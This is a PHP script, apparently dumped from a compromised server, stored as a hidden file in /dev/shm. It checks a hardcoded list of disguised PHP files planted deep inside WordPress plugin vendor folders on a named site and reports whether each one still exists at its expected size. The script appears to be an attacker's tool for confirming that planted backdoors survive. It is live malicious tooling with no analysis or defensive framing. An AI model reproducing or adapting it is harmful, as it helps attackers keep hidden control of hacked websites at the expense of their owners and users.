Current File : //dev/shm/.res
<?php   $r = '/home/bronnnhh/balafy.com'; $x = ["/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/src/Google/Ads/GoogleAds/V20/Resources/AdGroup/DemandGenAdGroupSettings/langconfig.php"=>"bd@@94216@@955",
"/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/src/Google/Ads/GoogleAds/V20/Resources/Recommendation/CampaignBudgetRecommendation/3dsecure.php"=>"bd@@94217@@859",
"/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/src/Google/Ads/GoogleAds/V20/Enums/AssetTypeEnum/golink.php"=>"bd@@94219@@901",
"/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/src/Google/Ads/GoogleAds/V20/Errors/StringLengthErrorEnum/robots.php"=>"bd@@94220@@909",
"/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/src/Google/Ads/GoogleAds/V20/Errors/PolicyValidationParameterErrorEnum/formselect.php"=>"bd@@94222@@1004",
"/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/src/Google/Ads/GoogleAds/V20/Errors/ProductLinkInvitationErrorEnum/quiz_grading.php"=>"bd@@68892@@894",
"/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/src/Google/Ads/GoogleAds/V20/Errors/LabelErrorEnum/sync.php"=>"bd@@68894@@1031",
"/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/src/Google/Ads/GoogleAds/V20/Resources/tahomab.php"=>"bd@@68896@@950",
"/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/src/Google/Ads/GoogleAds/Util/V20/jpgraph_regstat.php"=>"bd@@68899@@1024",
"/wp-content/plugins/mailpoet/vendor/mailpoet/email-editor/tests/unit/Engine/Renderer/Preprocessors/Typography.Preprocessor.Test.php"=>"bd@@68904@@880",
"/wp-content/plugins/elementor/data/v2/base/exceptions/error.error.php"=>"bd@@68759@@971"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');